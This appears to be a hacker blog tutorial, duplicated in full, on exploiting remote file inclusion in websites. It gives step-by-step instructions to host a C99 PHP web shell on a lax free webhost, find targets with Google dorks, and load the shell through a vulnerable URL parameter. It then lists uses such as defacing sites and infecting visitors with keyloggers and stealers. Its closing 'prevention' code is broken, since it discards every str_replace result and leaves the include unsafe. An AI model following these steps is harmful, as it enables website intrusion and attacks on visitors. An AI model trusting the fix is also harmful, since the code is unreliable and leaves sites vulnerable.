Hello in this mini-tutorial i am going to show you how to use PHP shells such as c99 or other shells to hack/recover your website admin account or deface it so its for educational purposes ONLY.
ok lets start.
Step 1 - Grab yourself a C99 shell from Here.
Step 2 - You need to find a free webhost to host it without deleting your account. i prefer http://www.7host.com since they don't check your accounts Grin
Step 3 - Register on a free hosting site and upload the C99.php ofc if your a PHP programmer i suggest you password protect that using This Script.
Step 4 - Dorks to type in Google are:here
also some pages with certain variables can be vuln too but these are the most common. such can be like inurl:?buy=car.php
Step 5 - For seeing if a site is vulnerable you can try this:
Imagine a link is:
http://yoursite.com/?link=http://yoursite.com/web.php
for testing you do:
http://yoursite.com/?link=http://google.com/index.php
if Google's index page also loads in that page then its vulnerable
Step 6 - If you find a vulnerable site hat you need to do is replace that link with the C99 shell link you uploaded on your free webhost:
http://yoursite.com/?link=http://you.somefreehost.com/c99.php
and wham! the C99 page is also loaded! you can now:
Upload Files
Delete Files
Move Files
Copy Files
DOS the site
Deface it
Bruteforce FTP password
Lag it
Redirect visitors
Install Drive-By's
Grab Visitor Information and test exploitation on them
Infect Visitors ( RAT - Keylogger - Stealer )
Execute SQL commands
Manage SQL accounts
Execute PHP commands
...
End of Tutorial
ok Now how to prevent RFI on your website or server?
RFI is caused by this:
<?php
$inc = $_GET['link'];
include($inc);
?>
To prevent that we replace strings on the include link:
<?php
$inc = $_GET['link'];
str_replace("http://", "", $inc);
str_replace("https://", "", $inc);
str_replace("www.", "", $inc);
str_replace(".php", "", $inc);
str_replace(".html", "", $inc);
str_replace(".", "", $inc);
str_replace("/", "", $inc);
str_replace("&", "", $inc);
str_replace("'", "", $inc);
str_replace(">", "", $inc);
str_replace(".com", "", $inc);
str_replace(".net", "", $inc);
str_replace(".org", "", $inc);
str_replace(".info", "", $inc);
str_replace("etc", "", $inc);
str_replace("passwd", "", $inc);
str_replace("..", "", $inc);
str_replace("...", "", $inc);
include($inc);
?>
This way not only the include page wont be vuln to RFI but also protected from many more hacking methods
Thank you (zer0w0rm)
ok lets start.
Step 1 - Grab yourself a C99 shell from Here.
Step 2 - You need to find a free webhost to host it without deleting your account. i prefer http://www.7host.com since they don't check your accounts Grin
Step 3 - Register on a free hosting site and upload the C99.php ofc if your a PHP programmer i suggest you password protect that using This Script.
Step 4 - Dorks to type in Google are:here
also some pages with certain variables can be vuln too but these are the most common. such can be like inurl:?buy=car.php
Step 5 - For seeing if a site is vulnerable you can try this:
Imagine a link is:
http://yoursite.com/?link=http://yoursite.com/web.php
for testing you do:
http://yoursite.com/?link=http://google.com/index.php
if Google's index page also loads in that page then its vulnerable
Step 6 - If you find a vulnerable site hat you need to do is replace that link with the C99 shell link you uploaded on your free webhost:
http://yoursite.com/?link=http://you.somefreehost.com/c99.php
and wham! the C99 page is also loaded! you can now:
Upload Files
Delete Files
Move Files
Copy Files
DOS the site
Deface it
Bruteforce FTP password
Lag it
Redirect visitors
Install Drive-By's
Grab Visitor Information and test exploitation on them
Infect Visitors ( RAT - Keylogger - Stealer )
Execute SQL commands
Manage SQL accounts
Execute PHP commands
...
End of Tutorial
ok Now how to prevent RFI on your website or server?
RFI is caused by this:
<?php
$inc = $_GET['link'];
include($inc);
?>
To prevent that we replace strings on the include link:
<?php
$inc = $_GET['link'];
str_replace("http://", "", $inc);
str_replace("https://", "", $inc);
str_replace("www.", "", $inc);
str_replace(".php", "", $inc);
str_replace(".html", "", $inc);
str_replace(".", "", $inc);
str_replace("/", "", $inc);
str_replace("&", "", $inc);
str_replace("'", "", $inc);
str_replace(">", "", $inc);
str_replace(".com", "", $inc);
str_replace(".net", "", $inc);
str_replace(".org", "", $inc);
str_replace(".info", "", $inc);
str_replace("etc", "", $inc);
str_replace("passwd", "", $inc);
str_replace("..", "", $inc);
str_replace("...", "", $inc);
include($inc);
?>
This way not only the include page wont be vuln to RFI but also protected from many more hacking methods
Thank you (zer0w0rm)
I have been using Kaspersky protection for many years, I would recommend this product to all of you.
ReplyDelete